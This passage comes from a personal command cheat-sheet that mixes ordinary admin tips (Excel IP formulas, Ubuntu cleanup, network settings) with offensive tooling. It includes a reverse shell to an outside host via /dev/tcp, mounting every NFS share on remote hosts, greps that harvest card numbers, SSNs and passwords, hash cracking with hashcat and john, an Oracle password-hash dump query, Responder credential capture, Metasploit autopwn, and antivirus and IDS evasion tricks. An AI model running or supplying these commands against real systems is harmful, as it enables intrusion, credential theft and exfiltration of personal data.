1557End Function
1558
1559
1560# The length of the IP string and the first octet delineator
1561=LEN(D6)
1562=FIND(".",D6)
1563
1564#Octet 1
1565=LEFT(D6,FIND(".",D6)-1)
1566
1567#Octets 2-4
1568=RIGHT(D6,(LEN(D6)-FIND(".",D6)))
1569
1570#Octet 2
1571=LEFT(RIGHT(D6,(LEN(D6)-FIND(".",D6))),FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))-1)
1572
1573# Location of the second "."
1574=FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))
1575
1576#Length of last three octets
1577=LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))
1578
1579#Lenght of the last two octets
1580=LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))
1581
1582#Octets 3-4
1583=RIGHT(RIGHT(D6,(LEN(D6)-FIND(".",D6))),LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6)))))
1584
1585#Location of the third "."
1586=FIND(".",RIGHT(RIGHT(D6,(LEN(D6)-FIND(".",D6))),LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))))
1587
1588#Octet 3
1589=LEFT(RIGHT(RIGHT(D6,(LEN(D6)-FIND(".",D6))),LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))),FIND(".",RIGHT(RIGHT(D6,(LEN(D6)-FIND(".",D6))),LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))))-1)
1590
1591#Octet 4
1592=RIGHT(RIGHT(RIGHT(D6,(LEN(D6)-FIND(".",D6))),LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))),(LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(RIGHT(D6,(LEN(D6)-FIND(".",D6))),LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))))))
1593
1594#Last Octet with incremented (by 1) host IP
1595=TEXT((VALUE(RIGHT(RIGHT(RIGHT(D6,(LEN(D6)-FIND(".",D6))),LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))),(LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(RIGHT(D6,(LEN(D6)-FIND(".",D6))),LEN(RIGHT(D6,(LEN(D6)-FIND(".",D6))))-FIND(".",RIGHT(D6,(LEN(D6)-FIND(".",D6)))))))))+1),"0")
1596
1597#Reassembly of the new IP address, the number +2, near the end of the string is the amount the host address will be incremented by
1598=CONCATENATE(LEFT($D6,FIND(".",$D6)-1),".",LEFT(RIGHT($D6,(LEN($D6)-FIND(".",$D6))),FIND(".",RIGHT($D6,(LEN($D6)-FIND(".",$D6))))-1),".",LEFT(RIGHT(RIGHT($D6,(LEN($D6)-FIND(".",$D6))),LEN(RIGHT($D6,(LEN($D6)-FIND(".",$D6))))-FIND(".",RIGHT($D6,(LEN($D6)-FIND(".",$D6))))),FIND(".",RIGHT(RIGHT($D6,(LEN($D6)-FIND(".",$D6))),LEN(RIGHT($D6,(LEN($D6)-FIND(".",$D6))))-FIND(".",RIGHT($D6,(LEN($D6)-FIND(".",$D6))))))-1),".",TEXT((VALUE(RIGHT(RIGHT(RIGHT($D6,(LEN($D6)-FIND(".",$D6))),LEN(RIGHT($D6,(LEN($D6)-FIND(".",$D6))))-FIND(".",RIGHT($D6,(LEN($D6)-FIND(".",$D6))))),(LEN(RIGHT($D6,(LEN($D6)-FIND(".",$D6))))-FIND(".",RIGHT($D6,(LEN($D6)-FIND(".",$D6))))-FIND(".",RIGHT(RIGHT($D6,(LEN($D6)-FIND(".",$D6))),LEN(RIGHT($D6,(LEN($D6)-FIND(".",$D6))))-FIND(".",RIGHT($D6,(LEN($D6)-FIND(".",$D6)))))))))+2),"0"))
1599
1600
1601# IP | HOSTNAME to IP (HOSTNAME) in one cell in excel
1602=CONCATENATE(A9,(IF(ISBLANK(B9),""," ("&B9&")")))
1603
1604# Mount all NFS shares on a remote host with input file nfs as hosts to mount
1605--------------------------------------
1606
1607# cleanup
1608for i in `ls /nfs*` ;do umount "/nfs/$i" ;done
1609
1610mkdir /nfs
1611# Mount all NFS shares on a remote host with input file nfs as hosts to mount
1612for i in `cat nfs`
1613do
1614
1615
1616for j in `showmount -e $i |awk '{print $1}'`
1617do
1618var1=$RANDOM
1619mkdir /nfs/$i_$var1
1620mount -t nfs $i:$j /nfs/$i_$var1
1621done
1622
1623done
1624
1625echo creating nfs_report.txt
1626
1627df | grep : | sort -u > nfs_report.txt
1628for i in `df | grep : | sort -u | awk '{print $6}'`
1629do
1630
1631find "$i" -maxdepth 2 -type f -exec file '{}' \; >> nfs_report.txt
1632
1633done
1634
1635
1636==-==========================
1637
1638
1639
1640
1641
1642
1643# example PII search CC and SSN with dashes and max results 10 per file
1644find . -maxdepth 6 -size -100000k -type f -exec egrep --max-count 10 -A 2 -B 2 -Hia "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b" '{}' \;
1645
1646# head all files for passwords gonig 6 deep ( peeking into all files not just small ones .. )
1647find . -maxdepth 6 -type f -exec head -c 100000 '{}' \; |egrep -Hia -A 4 -B 4 passw
1648
1649# find passwords 6 deep and less then 1m adding padding so you can see username/hostname info before or after the password field ..
1650find . -maxdepth 6 -size -100000k -type f -exec egrep -A 4 -B 4 -Hia passw '{}' \;
1651
1652
1653# can't read ? what is wrong with you ??? find readable files...
1654find . -readable -type f
1655
1656# do a quick tree dump 3 levels deep of folders
1657find . -maxdepth 3 \( -path /opt -o -path /proc -o -path /tmp \) -prune -o -type d
1658
1659
1660# auto login tty1
1661vi /etc/init/tty1.conf
1662exec /bin/login -f administrator < /dev/tty1 > /dev/tty1 2>&1
1663
1664# startx to fvwm-crystal
1665apt-get install xinit -y
1666echo 'exec fvwm-crystal' > ~/.xinitrc
1667
1668# install stuff
1669apt-get install build-essential libssl-dev partimage gparted lynx links curl nmap iotop screen medusa wireshark macchanger htop net-tools -y
1670
1671
1672#force umount
1673umount -l /mnt/myfolder
1674umount -f -l /mnt/myfolder
1675
1676
1677#Clipboard Copy and Paste does not work in vSphere Client
1678#Options > Advanced > General and click Configuration Parameters. Click Add Row.
1679
1680isolation.tools.copy.disable FALSE
1681isolation.tools.paste.disable FALSE
1682
1683
1684
1685#VLC convert transcoding
1686vlc $1 -I dummy "./$a" --sout "#transcode{width=320,height=240 ,vcodec=mp1v,acodec=mpga,vb=128,ab=128,deinterlace}:standard{mux=ts,dst=\"./Trans_$1\",access=file}" vlc://quit
1687
1688
1689# ref http://en.wikipedia.org/wiki/Setuid
1690# find Setuid world writable files
1691find / \( \( -perm -4000 -o -perm -2000 -type f \) -and \( -perm -0002 -o -perm -0020 \) \) -type f -ls
1692
1693
1694find . -perm 777 -exec chmod 755 {} \;
1695find / -perm 777 -type d
1696
1697#sort char by lenth
1698#! /bin/sh
1699awk 'BEGIN { FS=RS }
1700{ print length, $0 }' $* |
1701# Sort the lines numerically
1702sort +0n -1 |
1703# Remove the length and the space and print each line
1704sed 's/^[0-9][0-9]* //'
1705
1706
1707# imagemagik convert create TN
1708IFS=$'\n' ;for img in `ls *.jpg` ; do convert -sample 256 -quality 90 '$img" "$img" ;done
1709
1710# du disk usage sort
1711du -k * | sort -nr | cut -f2 | xargs -d '\n' du -sh
1712
1713
1714#rev shell
1715nc -l -p 8080 -vvv
1716bash -i >& /dev/tcp/rmccurdy.com/8080 0>&1
1717
1718
1719#nagios
1720-c CheckEventLog -a file=application MaxWarn=1 MaxCrit=1 filter=new filter+generated=\<1d filter+eventID==208 truncate=120 filter+eventType==warning
1721
1722# IPFW limit max connects to 2
1723allow tcp from any 80 to any out via dc0 limit dst-addr 2
1724
1725# rm remove empty files
1726find . -depth -empty -type d -exec rmdir {} \;
1727
1728
1729
1730
1731ps aux --sort -rss |head -n 25
1732
1733# crack all ILO default hashes -12min on laptop from MSF dump IPMI hashes tool
1734./hashcat-cli64.exe --remove --outfile=batchcrack.out -m 7300 hashes.txt -a 3 ?d?d?d?d?d?d?d?d
1735
1736
1737# hashcat .. IPMI syntax
1738hashcat-cli64.exe -a 3 -m 7300 --pw-min=1 --pw-max=6 -p : -o "C:\backup\hashcat-0.47\HashcatGUI_043\hashes_found.txt" --outfile-format=3 -n 4 -c 64 "hashes.txt" -1 ?l?d ?1?1?1?1?1?1
1739
1740# copy 5k random files into current directory to home path great for filling up MP3 Player with random music
1741find . -type f |shuf |head -n 5000 |xargs -d$'\n' -I{} cp -v {} ~/
1742
1743# crack shadow passwords ( all types )
1744john --fo=bf -w:/backup/LAPTOP/backup/wordlist/rockyou.txt bcrypt.txt
1745john -show bcrypt.txt
1746
1747
1748# find examples to find multiple
1749find . -iname "screen*" -o -iname "*.log" -o -iname "*.txt" -exec grep -H '[+]' '{}' \;
1750
1751
1752mac address
1753C0:FF:EE:C0:FF:EE
1754DE:AD:BE:EF:CA:FE
1755DE:FE:CA:7E:B0:0B
1756
1757# log watch
1758tail -f `lsof | grep -ia log$ | awk '{print $9}' | sort |uniq`
1759
1760# Virtualbox mount stuff FVWM2 stuff
1761mount -t vboxsf delete /s
1762nm-applet ( may need to apt-get remove --purge "network-manager" -y;apt-get autoremove -y ; rm -Rf /etc/NetworkManager )
1763
1764
1765
1766# xss
1767http://singularityx.wordpress.com/2013/01/11/stealing-passwords-with-autocomplete-and-xss/
1768
1769# radar
1770http://cybermap.kaspersky.com/
1771
1772http://www.securitywizardry.com/radar.htm
1773
1774
1775# flows using graphviz as rendering engine. It works like this:
1776
1777* for %i in (*.pcap) tshark -r %i -q -z conv,tcp >> flows.txt
1778* parseflows.py -i flows.txt -o pretty.pdf
1779
1780
1781# shh VPN netblocks non routableish ..
178225.0.0.0/8
178314.0.0.0/8
17845.0.0.0/8
1785
1786
1787#malware sanbox
1788sanboxie BSA
1789https://malwr.com/ Malwr - Malware Analysis by Cuckoo Sandbox
1790https://anubis.iseclab.org Anubis Malware Analysis for Unknown Binaries
1791http://http://apac.pandasecurity.com/autovin-assistant Autovin-assistant - Panda Security Asia Pacific
1792http://bitblaze.cs.berkeley.edu/ BitBlaze: Binary Analysis for Computer Security
1793http://www.joesecurity.org/joe-sandbox-desktop Agile Malware Analysis - Joe Sandbox Desktop
1794http://malbox.xjtu.edu.cn/ Malbox is a service for malware analysis
1795http://www.threatexpert.com/submit.aspx ThreatExpert - Submit Your Sample Online
1796https://vicheck.ca/ ViCheck.ca - Find embedded malware in documents, PDFs
1797http://www.xandora.net/upload/ Xandora - Your Online Binary Analyser
1798
1799
1800
1801Excel Hell
1802
1803Join cells with commas =CONCATENATE(N8,",",O8,",",P8,",",Q8,",",R8)
1804remove trailing commas = SUBSTITUTE(TRIM(SUBSTITUTE(U5, ",", " "))," ", ",")
1805remove trailing commas ... with commas in them.. I know right : =LEFT(U2,LEN(U2)-(LEN(U2)-SEARCH(",,",U2)+1))
1806
1807# lookup in exchange outlook api
1808Public Function GetOffice1(var1)
1809
1810 Dim outApp As Object 'Application
1811 Dim outTI As Object 'TaskItem
1812 Dim outRec As Object 'Recipient
1813 Dim outAL As Object 'AddressList
1814
1815
1816 Set outApp = GetObject(, "Outlook.Application")
1817 Set outAL = outApp.Session.addressLists.Item("Global Address List")
1818 Set outTI = outApp.CreateItem(3)
1819
1820 outTI.Assign
1821
1822 Set outRec = outTI.Recipients.Add(var1)
1823 outRec.Resolve
1824 If outRec.Resolved Then
1825 'MsgBox outRec.addressEntry.Name
1826 GetOffice1 = outRec.addressEntry.GetExchangeUser.OfficeLocation
1827 'MsgBox outRec.addressEntry.GetExchangeUser.JobTitle
1828 'MsgBox outRec.addressEntry.GetExchangeUser.
1829 'MsgBox outAL.addressEntries(outRec.addressEntry.manager.Name).GetExchangeUser.Alias
1830 Else
1831 GetOffice1 = "Couldn't find Employee"
1832 End If
1833
1834
1835End Function
1836
1837
1838
1839# Private IP space used by at least tmobile ?
1840100.64.0.0 - 100.127.255.255
184125.0.0.0/8
1842
1843# CallRecorder Android
1844Device: Samsung Galaxy S4 ( T-Mobile )
1845Recording Method
1846Standard API
1847
1848
1849#Android Hardware keys kill app killall
1850Back Key (long press) Kill App
1851
1852# kill the god awful touchpad ...after disabling it via the systray settings...on startup...
1853cax.exe /RUH "C:\Program Files\Synaptics\SynTP\SynTPEnh.exe"
1854cax.exe /WAIT:10
1855cat.exe /KILLALL syntp*
1856
1857
1858
1859# WMP not in services list ... ok disable windows media player via cmd
1860sc config "WMPNetworkSvc" start= disabled
1861
1862#topports 2000 not 80ish for armitage
1863db_nmap -vvv -sV -T4 -p 1,3-4,6-7,9,13,17,19-27,30,32-33,37,42-43,49,53,55,57,59,70,77,79,83-90,98-100,102,106,109-111,113,119,123,125,127,135,139,143-144,146,157,161,163,179,199,210-212,220,222-223,225,250-252,254-257,259,264,280,301,306,311,333,340,366,388-389,406-407,411,416-417,419,425,427,441,444-445,447,458,464-465,475,481,497,500,502,512-515,523-524,540-541,543-545,548,554-557,563,587,593,600,602,606,610,616-617,621,623,625,631,636,639,641,646,648,655,657,659-660,666-669,674,683-684,687,690-691,700-701,705,709-711,713-715,720,722,725-726,728-732,740,748-749,754,757-758,765,777-778,780,782-783,786-787,790,792,795,800-803,805-806,808,822-823,825,829,839-840,843,846,856,859,862,864,873-874,878,880,888,898,900-905,911-913,918,921-922,924,928,930-931,943,953,969,971,980-981,987,990,992-993,995-996,998-1002,1004-1015,1020-1114,1116-1119,1121-1128,1130-1132,1134-1138,1141,1143-1145,1147-1154,1156-1159,1162-1169,1173-1176,1179-1180,1182-1188,1190-1192,1194-1196,1198-1201,1204,1207-1213,1215-1218,1220-1223,1228-1229,1233-1234,1236,1239-1241,1243-1244,1247-1251,1259,1261-1262,1264,1268,1270-1272,1276-1277,1279,1282,1287,1290-1291,1296-1297,1299-1303,1305-1311,1314-1319,1321-1322,1324,1327-1328,1330-1331,1334,1336-1337,1339-1340,1347,1350-1353,1357,1413-1414,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1516,1521-1522,1524-1526,1533,1547,1550,1556,1558-1560,1565-1566,1569,1580,1583-1584,1592,1594,1598,1600,1605,1607,1615,1620,1622,1632,1635,1638,1641,1645,1658,1666,1677,1683,1687-1688,1691,1694,1699-1701,1703,1707-1709,1711-1713,1715,1717-1723,1730,1735-1736,1745,1750,1752-1753,1755,1761,1782-1783,1791-1792,1799-1801,1805-1808,1811-1812,1823,1825,1835,1839-1840,1858,1861-1864,1871,1875,1900-1901,1911-1912,1914,1918,1924,1927,1935,1947,1954,1958,1971-1976,1981,1984,1998-2013,2020-2022,2025,2030-2031,2033-2035,2038,2040-2049,2062,2065,2067-2070,2080-2083,2086-2087,2095-2096,2099-2101,2103-2107,2111-2112,2115,2119,2121,2124,2126,2134-2135,2142,2144,2148,2150,2160-2161,2170,2179,2187,2190-2191,2196-2197,2200-2201,2203,2222,2224,2232,2241,2250-2251,2253,2260-2262,2265,2269-2271,2280,2288,2291-2292,2300-2302,2304,2312-2313,2323,2325-2326,2330,2335,2340,2366,2371-2372,2381-2383,2391,2393-2394,2399,2401,2418,2425,2433,2435-2436,2438-2439,2449,2456,2463,2472,2492,2500-2501,2505,2522,2525,2531-2532,2550-2551,2557-2558,2567,2580,2583-2584,2598,2600-2602,2604-2608,2622-2623,2628,2631,2638,2644,2691,2700-2702,2706,2710-2712,2717-2718,2723,2725,2728,2734,2800,2804,2806,2809,2811-2812,2847,2850,2869,2875,2882,2888-2889,2898,2901-2903,2908-2910,2920,2930,2957-2958,2967-2968,2973,2984,2987-2988,2991,2997-2998,3000-3003,3005-3007,3011,3013-3014,3017,3023,3025,3030-3031,3050,3052,3057,3062-3063,3071,3077,3080,3089,3102-3103,3118-3119,3121,3128,3146,3162,3167-3168,3190,3200,3210-3211,3220-3221,3240,3260-3261,3263,3268-3269,3280-3281,3283,3291,3299-3301,3304,3306-3307,3310-3311,3319,3322-3325,3333-3334,3351,3362-3363,3365,3367-3372,3374,3376,3388-3390,3396,3399-3400,3404,3410,3414-3415,3419,3425,3430,3439,3443,3456,3476,3479,3483,3485-3486,3493,3497,3503,3505-3506,3511,3513-3515,3517,3519-3520,3526-3527,3530,3532,3546,3551,3577,3580,3586,3599-3600,3602-3603,3621-3622,3632,3636-3637,3652-3653,3656,3658-3659,3663,3669-3670,3672,3680-3681,3683-3684,3689-3690,3697,3700,3703,3712,3728,3731,3737,3742,3749,3765-3766,3784,3787-3788,3790,3792-3793,3795-3796,3798-3801,3803,3806,3808-3814,3817,3820,3823-3828,3830-3831,3837,3839,3842,3846-3853,3856,3859-3860,3863,3868-3872,3876,3878-3880,3882,3888-3890,3897,3899,3901-3902,3904-3909,3911,3913-3916,3918-3920,3922-3923,3928-3931,3935-3937,3940-3941,3943-3946,3948-3949,3952,3956-3957,3961-3964,3967-3969,3971-3972,3975,3979-3983,3986,3989-4007,4009-4010,4016,4020,4022,4024-4025,4029,4035-4036,4039-4040,4045,4056,4058,4065,4080,4087,4090,4096,4100-4101,4111-4113,4118-4121,4125-4126,4129,4135,4141,4143,4147,4158,4161,4164,4174,4190,4192,4200,4206,4220,4224,4234,4242,4252,4262,4279,4294,4297-4298,4300,4302,4321,4325,4328,4333,4342-4343,4355-4358,4369,4374-4376,4384,4388,4401,4407,4414-4415,4418,4430,4433,4442-4447,4449,4454,4464,4471,4476,4516-4517,4530,4534,4545,4550,4555,4558-4559,4567,4570,4599-4602,4606,4609,4644,4649,4658,4662,4665,4687,4689,4700,4712,4745,4760,4767,4770-4771,4778,4793,4800,4819,4848,4859-4860,4875-4877,4881,4899-4900,4903,4912,4931,4949,4998-5005,5009-5017,5020-5021,5023,5030,5033,5040,5050-5055,5060-5061,5063,5066,5070,5074,5080-5081,5087-5088,5090,5095-5096,5098,5100-5102,5111,5114,5120-5122,5125,5133,5137,5147,5151-5152,5190,5200-5202,5212,5214,5219,5221-5223,5225-5226,5233-5235,5242,5250,5252,5259,5261,5269,5279-5280,5291,5298,5339,5347,5353,5357,5370,5377,5405,5414,5423,5431-5433,5440-5442,5444,5457-5458,5473,5475,5500-5502,5510,5520,5544,5550,5552-5555,5557,5560,5566,5580,5631,5633,5666,5678-5680,5718,5730,5800-5803,5807,5810-5812,5815,5818,5822-5823,5825,5850,5859,5862,5868-5869,5877,5899-5907,5909-5911,5914-5915,5918,5922,5925,5938,5940,5950,5952,5959-5963,5968,5981,5987-5989,5998-6009,6017,6025,6050-6051,6059-6060,6068,6100-6101,6103,6106,6112,6123,6129,6156,6203,6222,6247,6346,6389,6481,6500,6502,6504,6510,6520,6543,6547,6550,6565-6567,6580,6600,6646,6662,6666-6670,6689,6692,6699,6711,6732,6779,6788-6789,6792,6839,6881,6896,6901,6969,7000-7004,7007,7010,7019,7024-7025,7050-7051,7070,7080,7100,7103,7106,7123,7200-7201,7241,7272,7278,7281,7402,7435,7438,7443,7496,7512,7625,7627,7676,7725,7741,7744,7749,7770,7777-7778,7800,7878,7900,7911,7913,7920-7921,7929,7937-7938,7999-8002,8007-8011,8015-8016,8019,8021-8022,8031,8042,8045,8050,8083-8090,8093,8095,8097-8100,8118,8180-8181,8189,8192-8194,8200,8222,8254,8290-8294,8300,8333,8383,8385,8400,8402,8443,8481,8500,8540,8600,8648-8649,8651-8652,8654,8675-8676,8686,8701,8765-8766,8800,8873,8877,8888-8889,8899,8987,8994,8996,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9098-9103,9110-9111,9152,9191,9197-9198,9200,9207,9220,9290,9409,9415,9418,9443-9444,9485,9500-9503,9535,9575,9593-9595,9600,9618,9621,9643,9666,9673,9815,9876-9878,9898,9900,9914,9917,9941,9943-9944,9968,9988,9992,9998-10005,10008-10012,10022-10025,10034,10058,10082-10083,10160,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,10873,11110-11111,11967,12000,12006,12021,12059,12174,12215,12262,12265,12345-12346,12380,12452,13456,13722,13724,13782-13783,14000,14238,14441-14442,15000-15004,15402,15660,15742,16000-16001,16012,16016,16018,16080,16113,16705,16800,16851,16992-16993,17595,17877,17988,18000,18018,18040,18101,18264,18988,19101,19283,19315,19350,19780,19801,19842,19900,20000,20002,20005,20031,20221-20222,20828,21571,21792,22222,22939,23052,23502,23796,24444,24800,25734-25735,26000,26214,26470,27000,27352-27353,27355-27357,27715,28201,28211,29672,29831,30000,30005,30704,30718,30951,31038,31337,31727,32768-32785,32791-32792,32803,32816,32822,32835,33354,33453,33554,33899,34571-34573,35500,35513,37839,38037,38185,38188,38292,39136,39376,39659,40000,40193,40811,40911,41064,41511,41523,42510,44176,44334,44442-44443,44501,44709,45100,46200,46996,47544,48080,49152-49161,49163-49165,49167-49168,49171,49175-49176,49186,49195,49236,49400-49401,49999-50003,50006,50050,50300,50389,50500,50636,50800,51103,51191,51413,51493,52660,52673,52710,52735,52822,52847-52851,52853,52869,53211,53313-53314,53535,54045,54328,55020,55055-55056,55555,55576,55600,56737-56738,57294,57665,57797,58001-58002,58080,58630,58632,58838,59110,59200-59202,60020,60123,60146,60443,60642,61532,61613,61900,62078,63331,64623,64680,65000,65129,65310,65389
1864
1865# openvas greenbone cmd line scan
1866omp -h 127.0.0.1 -p 9390 -u admin -w password -X "<create_target><name>$RANDOM</name><hosts>"
1867`for i in `seq 1 255` ;do echo 192.168.1.$i",";done | tr -d '\n'`
1868"</hosts></create_target>"
1869
1870# ubuntu Install security updates only
1871
1872apt-get -s dist-upgrade | grep "^Inst" | grep -i securi | awk -F " " {'print $2'} | xargs apt-get install
1873
1874
1875# remove crap in ubuntu
1876apt-get remove deja-dup -y
1877for i in `apt-cache search ubuntuone|awk '{print $1}'`;do apt-get remove $i -y ;done
1878apt-get remove rhythmbox-plugin-zeitgeist geoclue geoclue-ubuntu-geoip geoip-database whoopsie -y
1879echo exit 0 > /etc/default/ntpdate
1880apt-get --yes purge unity-asset-pool unity-lens-* unity-scope-*
1881cd /etc/xdg/autostart/
1882sed --in-place 's/NoDisplay=true/NoDisplay=false/g' *.desktop
1883apt-get remove update-manager update-notifier -y
1884for i in `apt-cache search musicstore|awk '{print $1}'`;do apt-get remove $i -y ;done
1885for i in `apt-cache search empathy|awk '{print $1}'` ;do apt-get remove $i -y;done
1886apt-get remove -y indicator-messages
1887killall indicator-messages-service
1888killall unity-panel-service
1889
1890
1891# install ipad apps ipa from command line
1892# find all the IPA files and extract them
1893find . -name "*.ipa" -exec unzip -o '{}' \;
1894# set the parms to the extracted zips
1895chmod -R 777 ./Payload
1896# move the apps to the /Applicatoins folder
1897mv ./Payload/* /Applicatoins/
1898
1899
1900
1901#bash web dump links lynx
1902lynx -width=999 -source -nolist URL
1903
1904#winrar windows mass extract
1905for /f "delims=" %%i IN ('dir/s/b *.rar') do (
1906C:\usb\media\WinRAR\WinRAR.exe x "%%i" "%CD%"
1907)
1908
1909
1910#recon
1911pushpin
1912threatagent
1913jigsaw.rb
1914https://scans.io/
1915
1916
1917#record
1918tcpdump -w dump.pcap -i eth0
1919
1920# rewrite
1921tcprewrite --infile=dump.pcap --outfile=temp1.pcap --dstipmap=0.0.0.0/0:192.168.1.20 --enet-dmac=E0:DB:55:CC:13:F1
1922tcprewrite --infile=temp1.pcap --outfile=temp2.pcap --srcipmap=0.0.0.0/0:192.168.1.10 --enet-smac=84:A5:C8:BB:58:1A
1923tcprewrite --infile=temp2.pcap --outfile=final.pcap --fixcsum
1924sudo tcpreplay --intf1=eth0 final.pcap
1925
1926# playback 100x fulls speed
1927tcpreplay .t --loop=100 --intf1=eth0 final.pcap
1928
1929
1930#sharepoint hackin'
1931sparty
1932horse
1933SPScan
1934
1935# exchange 2007
1936setup.com /PrepareSchema
1937Setup.com /PrepareAD
1938
1939setup.com /PrepareLegacyExchangePermissions
1940setup.com /PrepareSchema
1941setup.com /PrepareAD
1942setup.com /PrepareAllDomains
1943
1944# auto login
1945
1946reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "DefaultUserName" /d "Administrator" /f
1947reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "DefaultPassword" /d "OMGYERPASSWORD" /f
1948reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AdminAutoLogin" /d "1" /f
1949
1950
1951# block youtube annotatoins
1952This is for anyone who runs adblock plus in firefox (should work in chrome as well) and wants to disable the annoying annotations / popups on youtube. If you have adblock installed just do the following:
1953
1954Firefox>tools>adblock plus>filter preferences
1955
1956Click add filter group, name the filter whatever you like and then in filter actions click paste after you have copied the text below.
1957
1958Quote:
1959||youtube.com/annotations_
1960
1961# responder
1962Responder.py -bwrd --lm -i IP
1963
1964
1965# oracle oclhashcat table dump
1966SELECT password,spare4,name FROM sys.user$ WHERE password is not null;
1967
1968# MSF UAC
1969In our experience, we can get a shell even with SEP NTP enabled. We used bind_tcp instead of reverse_tcp after lots of testing. It looks like SEP only recognized reverse meterpreter but not the bind_tcp. Here are the steps we did:
19701. Fragmented all our traffic (fragrouter)
19712. Set MTU to 24
1972I don.t know if the above has any effect at all. We haven.t looked into it.
1973On metasploit
19741. We set the TCP_MAX_SENDSIZE to 3 or 4
19752. Used meterpreter bind_tcp.
1976I hope this will be of some help.
1977
1978https://github.com/mattifestation/PowerSploit
1979
1980
1981http://hak5.org/category/episodes/metasploit-minute
1982
1983
1984# autopwn with new MSF bin
1985# download autopwn
1986cd /opt/metasploit/apps/pro/msf3/plugins/
1987wget 'https://raw.github.com/neinwechter/metasploit-framework/autopwn-modules/plugins/db_autopwn.rb'
1988
1989# get postgres password
1990cat /opt/metasploit/apps/pro/msf3/config/database.yml
1991
1992# remove plugin
1993find /opt -iname "*trans2open*" -exec rm '{}' \;
1994
1995
1996# start MSF
1997load db_autopwn
1998
1999# clear the DB
2000# pg_hba.conf local all all trust restart postgres
2001psql msf3 -U msf3
2002DELETE FROM hosts;
2003DELETE FROM services;
2004DELETE FROM events;
2005DELETE FROM notes;
2006DELETE FROM creds;
2007DELETE FROM loots;
2008DELETE FROM sessions;
2009DELETE FROM clients;
2010\q
2011
2012# gogo
2013db_nmap -p 445 10.0.2.2
2014db_autopwn -p -t -e -v
2015
2016
2017
2018
2019# IDS Evasion for NFS, example of different options
2020
2021nmap --spoof-mac Apple --traceroute -T1 --data-length 9 -f -D 192.168.1.2,ME,RND:5 -v -n -O -sV -oA ~/scan.txt --log-errors -p T:111,1110,2049,4045,U:111,1110,2049,4045 --randomize-hosts 192.168.1.1-10
2022
2023nmap -Dmicrosoft.com,github.com,fbi.gov,google.com -sS -sV -T3 -f -mtu=24 -data-length=1227 74.125.225.142 -p 80,22
2024
2025# nmap xml 2 html
2026sltproc scan.xml -o "`date +%m%d%y`_report.html"
2027
2028# peg GPU OCLHASHCAT
2029--attack-mode 3 --gpu-accel 160 --gpu-loops 1024 --runtime 9000 --force --custom-charset1 ?l?d?s?u --hash-type 131 0x0100aaaaaaaa0000000000000000000000000000000000000000aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2030
2031# dhcp
2032netsh interface ipv4 set address name="LAN" dhcp
2033netsh interface ipv4 set dnsservers name="LAN" source=dhcp
2034
2035# STATIC IP
2036
2037c:\windows\System32\ipconfig.exe /release
2038
2039netsh interface ipv4 set address name="LAN" source=static address=172.16.2.XXX mask=255.255.252.0 gateway=172.16.1.1
2040
2041netsh interface ipv4 add dnsserver name="LAN" address=172.16.2.253 index=1
2042netsh interface ipv4 add dnsserver name="LAN" address=198.6.1.2 index=2
2043
2044Spiderlabs Responder
2045python Responder.py -i 10.0.0.10 -b 1 -r 1 -w On --lm=1
2046
2047
2048# metagoofil checkout
2049checkout http://metagoofil.googlecode.com/svn/trunk/ metagoofil-read-only
2050
2051
2052# dump script
2053python metagoofil.py -d $1 -t xlsx -l 500 -n 500 -o $1files -f xlsx_results.html
2054python metagoofil.py -d $1 -t docx -l 500 -n 500 -o $1files -f docx_results.html
2055python metagoofil.py -d $1 -t pptx -l 500 -n 500 -o $1files -f pptx_results.html
2056
2057python metagoofil.py -d $1 -t xls -l 500 -n 500 -o $1files -f xls_results.html
2058python metagoofil.py -d $1 -t doc -l 500 -n 500 -o $1files -f doc_results.html
2059python metagoofil.py -d $1 -t ppt -l 500 -n 500 -o $1files -f ppt_results.html
2060
2061python metagoofil.py -d $1 -t pdf -l 500 -n 500 -o $1files -f pdf_results.html
2062
2063
2064
2065# fix stupid trim file names ...
2066rename 's/^(.{32}).*(\..*)$/$1$2/' *
2067
2068
2069
2070nmap compile
2071./configure --without-zenmap --without-ncat --with-libpcap=included
2072
2073nmap ping scan
2074nmap --script broadcast-ping -oA ping_all -n -sP
2075
2076How to increase mouse sensitivity beyond limits in Windows Regedit
2077reg add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /d "2" /f
2078reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /d "0" /f
